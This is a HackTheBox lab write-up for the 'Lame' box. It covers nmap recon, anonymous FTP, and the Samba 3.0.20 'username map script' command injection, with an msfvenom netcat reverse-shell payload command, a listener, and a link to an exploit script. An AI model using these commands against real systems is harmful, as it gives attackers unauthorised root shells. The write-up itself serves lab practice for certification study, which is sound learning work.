Lame HTB Writeup

Viren Saroha
3 min read · Jun 28, 2021

Hi everyone, this is my writeup for the box “Lame” from HackTheBox.

I am a student preparing for the OSCP exam, so I decided to work through the well-known TJNull list of boxes. This is the first writeup from it.

Overview : Anonymous FTP login, then a Samba 3.0.20 “username map script” command injection to get a reverse shell as root.

IP address of the Machine : 10.10.10.3

Part 1 : Recon

1. Start with an Nmap scan to find the open ports and the service versions behind them (-sC runs the default scripts, which is where the anonymous-FTP check comes from, -sV probes versions, and -Pn skips host discovery):

nmap -sC -sV -Pn 10.10.10.3

The scan reports four open ports:

Port 21 : FTP, vsftpd 2.3.4 (anonymous login allowed)

Port 22 : OpenSSH 4.7p1

Port 139 and Port 445 : Samba 3.0.20

Part 2 : Enumeration

The Nmap script output shows that anonymous FTP login is allowed, so let's connect via FTP first.

There were no files to access over FTP, so nothing to gain there.

Moving on, a search for “Samba 3.0.20 exploit” turns up several hits: this version is affected by the well-known command injection through Samba's “username map script” option, where the username sent at login is passed to a shell unsanitised.

Be careful with Metasploit modules, though: the OSCP exam limits Metasploit to a single target, so it pays to practise the manual route.

So I found a standalone exploit we can use:

https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

It works, but we have to supply our own reverse-shell payload; the script only takes care of sending it to the target.

msfvenom can generate the reverse-shell command. Note that with -f python the payload is emitted as a Python bytes literal (a buf variable), which matters when pasting it into the script:

msfvenom -p cmd/unix/reverse_netcat LHOST=<YOUR IP> LPORT=<PORT NO> -f python

Start a Netcat listener in another tab to catch the reverse shell:

nc -nvlp <PORT NO>

Now run the exploit after dropping in the reverse-shell payload. I ran into some problems while running it:

Error 1 :

Error 2 :

I googled them and found fixes. If you hit the same errors, the reference below covers the bytes-to-string one: the msfvenom -f python output is a bytes object while the script builds a str username, so the payload has to be decoded before it is concatenated.

https://stackoverflow.com/questions/606191/convert-bytes-to-a-string

After making the above changes the final exploit looks like this :

Part 3 : Getting Flags

Fire the exploit and this time you will get a reverse shell in the Netcat listener you started in the other tab.

We get the reverse shell as root: the command injected through the username runs under smbd, which runs as root on this box, so no privilege escalation is needed.

Getting the user and root flags is now a piece of cake.

And the machine is pwned.

Things I learned from this Box :

→ Some Python knowledge is a must in order to read the exploit, understand what it sends, and fix it when it breaks.

So this was the first of many more writeups from the list. Stay tuned, and thanks for reading; I hope you liked it.

Any feedback or suggestions are appreciated.

You can reach out to me on :

Twitter : https://twitter.com/Viren2737

LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/
